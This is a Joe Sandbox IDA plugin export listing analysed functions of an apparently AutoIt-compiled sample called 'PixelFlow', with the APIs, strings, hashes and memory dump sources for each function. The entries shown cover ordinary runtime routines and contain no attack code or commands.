Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
String ID: >>>AUTOIT SCRIPT<<<
API String ID: 1552873950-2806939583
Opcode ID: 1ebd95094ab21ded0e4071c33e456c2cf2a9ba91fde532f75e1fa86eb27d06e8
Instruction ID: ce66857403d959e3442deb225592642a30584edc326233c2f85a89978c6ab4c5
Opcode Fuzzy Hash: 1ebd95094ab21ded0e4071c33e456c2cf2a9ba91fde532f75e1fa86eb27d06e8
Instruction Fuzzy Hash: 40513DB1D04259AFDF64DF64DC41A9EBBBAFF48304F00449EB649A3341DB715A808F68

Function 00620F16 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0062586C: __FF_MSGBANNER.LIBCMT ref: 00625883
Part of subcall function 0062586C: __NMSG_WRITE.LIBCMT ref: 0062588A
Part of subcall function 0062586C: RtlAllocateHeap.NTDLL(00CD0000,00000000,00000001,?,?,?,?,00620F33,?,0000FFFF), ref: 006258AF

std::exception::exception.LIBCMT ref: 00620F4C
__CxxThrowException@8.LIBCMT ref: 00620F61

Part of subcall function 006286FB: RaiseException.KERNEL32(?,?,0000FFFF,006BAE78,?,?,?,?,?,00620F66,0000FFFF,006BAE78,?,00000001), ref: 00628750

Strings

h=i, xrefs: 00620F41
`=i, xrefs: 00620F49, 00620F56
`=i, xrefs: 00620F59

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID: `=i$`=i$h=i
API String ID: 3902256705-3149925142
Opcode ID: 4880a5b5d5dd9cd4840edacf02b03e99f0761de7d495509172b8c40a05c89ee1
Instruction ID: 0db68312b633aad91b4d1f4a0a2a45d42cfcb9e2a625256e046eaec5fa745c44
Opcode Fuzzy Hash: 4880a5b5d5dd9cd4840edacf02b03e99f0761de7d495509172b8c40a05c89ee1
Instruction Fuzzy Hash: F0F0F93154463D66DB20BB58FD115DE7BAE9F10354F000029FC0492642DFB08B84CAD9

Function 0062556D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006255CB
_memcpy_s.LIBCMT ref: 0062563D
__read_nolock.LIBCMT ref: 0062569B
__filbuf.LIBCMT ref: 006256BE
_memset.LIBCMT ref: 00625702

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
Instruction ID: 69525ffd5933793e2c1a4f60ae6413a7d9a1dfc863f3a7ac6287582e7a5bb97e
Opcode Fuzzy Hash: 6144165ff69bcfd719b70aa37aa99b766954ae34ab2424f86f42b6890169cbb7
Instruction Fuzzy Hash: 6751BF70A01E25DBDB349F69A8806AE77A7AF40320F24872DF827A66E0D7709D518F51

Function 006052B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006052E6
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0060534A
TranslateMessage.USER32(?), ref: 00605356
DispatchMessageW.USER32(?), ref: 00605360

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Message$Peek$DispatchTranslate
String ID:
API String ID: 1795658109-0
Opcode ID: 47d1badc4b49f3cad736430449c07cc717c4480d9c7838ccdd672321a1f2cd26
Instruction ID: 46a4ca0702c21b3f32d619a25cacbfe4fd44244da9bd69093b2580adb51a1672
Opcode Fuzzy Hash: 47d1badc4b49f3cad736430449c07cc717c4480d9c7838ccdd672321a1f2cd26
Instruction Fuzzy Hash: 6B3126305847059BEB38CB64DC44FFB3BAB9B11304F10141AE423872E1E7B4A986DB65

Function 00601284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00601275,SwapMouseButtons,00000004,?), ref: 006012A8
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00601275,SwapMouseButtons,00000004,?), ref: 006012C9
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00601275,SwapMouseButtons,00000004,?), ref: 006012EB

Strings

Control Panel\Mouse, xrefs: 006012A6

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 6d8ed3cc505572cec8393394c29439af8fbda0f45adddf6962493aae3e0de650
Instruction ID: 9efe8cec28f670737cdc79edad99c5b85cf0d02426c4d87af2972f28329ac38a
Opcode Fuzzy Hash: 6d8ed3cc505572cec8393394c29439af8fbda0f45adddf6962493aae3e0de650
Instruction Fuzzy Hash: 69117C71550208BFDB258FA4DC84EEFBBBDEF06740F00456AF805DB250E2319E4097A0

Function 00663FB5 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00663FDA
Process32FirstW.KERNEL32(00000000,?), ref: 00663FE8
Process32NextW.KERNEL32(00000000,?), ref: 00664008
FindCloseChangeNotification.KERNELBASE(00000000), ref: 006640B2

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 8a4970c909a6f5e78e65d68548e6f85ccc32b940c2bd19507807470424572494
Instruction ID: 78f8e25b9bafdd0c2ecd26cae2118f42c9363e47054e6006b70ef730b8e87aaa
Opcode Fuzzy Hash: 8a4970c909a6f5e78e65d68548e6f85ccc32b940c2bd19507807470424572494
Instruction Fuzzy Hash: E83175711083419FD300EF50D885AEFBBEAEF95350F44092DF685C61A1EF719A89CB96

Function 00615B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00615B58

Part of subcall function 006156F8: _memset.LIBCMT ref: 00615787
Part of subcall function 006156F8: _wcscpy.LIBCMT ref: 006157DB
Part of subcall function 006156F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 006157EB

KillTimer.USER32(?,00000001,?,?), ref: 00615BAD
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00615BBC
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00650CFC

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 8677d6bd1a679f2dada7c934ea4a9255a67a496413d21e22a4ce463266a6a86b
Instruction ID: bca9d2049edb0d1be2157b69fe052438b3a97f93de6c20ffd0aae255a2a6a099
Opcode Fuzzy Hash: 8677d6bd1a679f2dada7c934ea4a9255a67a496413d21e22a4ce463266a6a86b
Instruction Fuzzy Hash: B1212C705087849FF7728B24C895FEAFBEEAF42308F04008EE69E56251C37469C9CB41

Function 0061278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 006149C2: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,?,006127AF,?,00000001), ref: 006149F4

_free.LIBCMT ref: 0064FA84
_free.LIBCMT ref: 0064FACB

Part of subcall function 006129BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00612ADF

Strings

Bad directive syntax error, xrefs: 0064FAB3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: Bad directive syntax error
API String ID: 2861923089-2118420937
Opcode ID: 1cede0f3f632b11e4d07b2366ed3c4e671ca4602fbdcca674ce459390541e9ed
Instruction ID: d3129be3db80e4cc0087f5012d24129d6f2bae119029888993c8a0b356b0e4d2
Opcode Fuzzy Hash: 1cede0f3f632b11e4d07b2366ed3c4e671ca4602fbdcca674ce459390541e9ed
Instruction Fuzzy Hash: 3B915C71910219EFCF54EFA4DC919EEBBB6BF09310F14442EF816AB291DB309A45CB94

Function 006148B0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006148FA

Strings

EA06, xrefs: 00650821
AU3! ?i, xrefs: 006148F4

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _memmove
String ID: AU3! ?i$EA06
API String ID: 4104443479-3191697252
Opcode ID: ab4e73feee60ed9faf4f0e75bc4cc231e6e9b0e6197718a47504cacccc69717b
Instruction ID: 090d9eab81e0bd4dd936e92518edca63e4385f8ad6f652a603a1e598eda17b7d
Opcode Fuzzy Hash: ab4e73feee60ed9faf4f0e75bc4cc231e6e9b0e6197718a47504cacccc69717b
Instruction Fuzzy Hash: BA415962A041985BEF219B648851BFF7FA78F45310F6C4469EC82EB386CE209DC5C7A5

Function 00669B5E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00614AB2: __fread_nolock.LIBCMT ref: 00614AD0

_wcscmp.LIBCMT ref: 00669C4E
_wcscmp.LIBCMT ref: 00669C61

Strings

FILE, xrefs: 00669B9A

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 9d60e73eb563c774bd058f61d52e1f3ac592b8d8720757526edb6f153203b6cd
Instruction ID: 97789711286c54751e3fa5a9e17e99d39bfcf3c42ff1ae8fac1c0b959f878f20
Opcode Fuzzy Hash: 9d60e73eb563c774bd058f61d52e1f3ac592b8d8720757526edb6f153203b6cd
Instruction Fuzzy Hash: 4E410B31A40219BADF219BA0DC45FEF7BFEDF45710F01446EFA00A7284DA7199448B65

Function 006131BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006502AB
GetOpenFileNameW.COMDLG32(?), ref: 006502F5

Part of subcall function 006201AF: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00612A58,?,00008000), ref: 006201CF

Part of subcall function 006208F0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 0062090F

Strings

X, xrefs: 006502C3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen_memset
String ID: X
API String ID: 3777226403-3081909835
Opcode ID: d5a04afcd901158ce2377f70f3dffad8e91ea3b64066b6ded40c4c11b03861b7
Instruction ID: bfa1c3d911b9e01f1a3e4633b9aa8775825585d5979ca077b34dd97b78519259
Opcode Fuzzy Hash: d5a04afcd901158ce2377f70f3dffad8e91ea3b64066b6ded40c4c11b03861b7
Instruction Fuzzy Hash: A421F371A10258ABDF41DFD4C845BEE7BFEAF49300F00401AE904A7281DBB49A89CFA5

Function 0067CF8E Relevance: 4.9, APIs: 3, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29aa663c9741b7ff6a79f6bd1d417a57bd2460044b9cb3f9fe4ea043a10be61b
Instruction ID: 37c29f3ee368bafa6d3d5e00b914b6ea67149aad9d10399e1d4180171a334a4e
Opcode Fuzzy Hash: 29aa663c9741b7ff6a79f6bd1d417a57bd2460044b9cb3f9fe4ea043a10be61b
Instruction Fuzzy Hash: ACF129B05083019FC754DF28C484A6ABBE6FF88314F14891EF9999B391DB71E946CF86

Function 006159D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006159F9
Shell_NotifyIconW.SHELL32(00000000,?), ref: 00615A9E
Shell_NotifyIconW.SHELL32(00000001,?), ref: 00615ABB

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: 9d470240e7a87de0dd7e549fde1fa1509e0e1fb3a1ee3a8040055692d33e9307
Instruction ID: fd3fa19b720f63c2c118e706af276adc212ae55b9b3e3be126e9bd07a852bfb0
Opcode Fuzzy Hash: 9d470240e7a87de0dd7e549fde1fa1509e0e1fb3a1ee3a8040055692d33e9307
Instruction Fuzzy Hash: 94317FB0505701DFD760DF24D884AEBBBE9EF88304F040A2EF59B82251D775A984CB96

Function 0062586C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00625883

Part of subcall function 0062A2CB: __NMSG_WRITE.LIBCMT ref: 0062A2F2
Part of subcall function 0062A2CB: __NMSG_WRITE.LIBCMT ref: 0062A2FC

__NMSG_WRITE.LIBCMT ref: 0062588A

Part of subcall function 0062A328: GetModuleFileNameW.KERNEL32(00000000,006C43BA,00000104,?,00000001,00620F33), ref: 0062A3BA
Part of subcall function 0062A328: ___crtMessageBoxW.LIBCMT ref: 0062A468

Part of subcall function 00623201: ___crtCorExitProcess.LIBCMT ref: 00623207
Part of subcall function 00623201: ExitProcess.KERNEL32 ref: 00623210

Part of subcall function 00628C88: __getptd_noexit.LIBCMT ref: 00628C88

RtlAllocateHeap.NTDLL(00CD0000,00000000,00000001,?,?,?,?,00620F33,?,0000FFFF), ref: 006258AF

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 10c5a2781fd163025e24d5248756c550fa6c35b7a9200b3c893a635193c4635e
Instruction ID: e746b0ccc568eb0554235cd396c1ae1346604aa329379fce9ddf7569566f0050
Opcode Fuzzy Hash: 10c5a2781fd163025e24d5248756c550fa6c35b7a9200b3c893a635193c4635e
Instruction Fuzzy Hash: 4D01D235346F319AD6616B74FC12A6A239BDF41360B54002AF502AB2D1DFB89D014EA5

Function 00669135 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00669143

Part of subcall function 00622EB5: RtlFreeHeap.NTDLL(00000000,00000000,?,00629B84,00000000,00628C8D,006258F3,?), ref: 00622EC9
Part of subcall function 00622EB5: GetLastError.KERNEL32(00000000,?,00629B84,00000000,00628C8D,006258F3,?), ref: 00622EDB

_free.LIBCMT ref: 00669154
_free.LIBCMT ref: 00669166

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 724accb53148675d503b4c34a56641df97542d11775b16153a68a1bcb8714e1b
Instruction ID: eb8f508083d4a694f3052498021db4ed7c9e95064777a0a8d5dfd15500e77fc8
Opcode Fuzzy Hash: 724accb53148675d503b4c34a56641df97542d11775b16153a68a1bcb8714e1b
Instruction Fuzzy Hash: A4E0C2B1A00B1352CE6065387904AC353DD2F49720725040DBD4AD3342CE30E8409838

Function 0066708E Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00666E83,00000000,?,00666F77,00000000,00000000,00642E79), ref: 006670A4
GetCurrentProcess.KERNEL32(?,00000000,?,00666E83,00000000,?,00666F77,00000000,00000000,00642E79), ref: 006670AC
DuplicateHandle.KERNELBASE(00000000,?,00666E83,00000000,?,00666F77,00000000,00000000,00642E79), ref: 006670B3

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 9165cdff6a3abdfb3592b92bdf5f40457a17291576438a851b30292303461ef6
Instruction ID: 77cf73eeee4a2eb362b13dd79cd9b14073623a0eb6dbc709e7a7ec4a2ffa2c27
Opcode Fuzzy Hash: 9165cdff6a3abdfb3592b92bdf5f40457a17291576438a851b30292303461ef6
Instruction Fuzzy Hash: 02D0C7BA000201BFE7011FA0EC0CF6A3B2EDBD5B22F20401AF604855109A7084004634

Function 00666EE6 Relevance: 4.5, APIs: 3, Instructions: 17COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00667658: InterlockedExchange.KERNEL32(?,?), ref: 0066766B
Part of subcall function 00667658: EnterCriticalSection.KERNEL32(?,?,0060C2B6,?,?), ref: 0066767C
Part of subcall function 00667658: TerminateThread.KERNEL32(00000000,000001F6,?,0060C2B6,?,?), ref: 00667689
Part of subcall function 00667658: WaitForSingleObject.KERNEL32(00000000,000003E8,?,0060C2B6,?,?), ref: 00667696
Part of subcall function 00667658: InterlockedExchange.KERNEL32(?,000001F6), ref: 006676A9
Part of subcall function 00667658: LeaveCriticalSection.KERNEL32(?,?,0060C2B6,?,?), ref: 006676B0

FindCloseChangeNotification.KERNELBASE(?,?,00666F4C), ref: 00666EF7
CloseHandle.KERNEL32(?,?,00666F4C), ref: 00666F00
DeleteCriticalSection.KERNEL32(?,?,00666F4C), ref: 00666F13

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740301081.00000000006BF000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740315426.00000000006C8000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_600000_PixelFlow.jbxd

Similarity

API ID: CriticalSection$CloseExchangeInterlocked$ChangeDeleteEnterFindHandleLeaveNotificationObjectSingleTerminateThreadWait
String ID:
API String ID: 744473657-0
Opcode ID: b95bf64d023c2c77db9236f2da0e1f44ff0e9a23fc952258c77e3293e929c4ee
Instruction ID: 80062148da5cef287c6839be6035165439299e38cdf8ab0b400fc6d8ec25f4d1
Opcode Fuzzy Hash: b95bf64d023c2c77db9236f2da0e1f44ff0e9a23fc952258c77e3293e929c4ee
Instruction Fuzzy Hash: BDE0BD33004A43AFD7812FA4F808889BBBABF487123241227F10982A31CB71A8A49F54

Function 00605E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON

Download Yara Rule

Strings

CALL, xrefs: 0063E164

Memory Dump Source

Source File: 0000000F.00000002.1740224082.0000000000601000.00000020.00000001.01000000.00000008.sdmp, Offset: 00600000, based on PE: true

Associated: 0000000F.00000002.1740210890.0000000000600000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.0000000000690000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000F.00000002.1740265968.00000000006B5000.00000002.00000001.01000000.00000008.sdmpDownload File
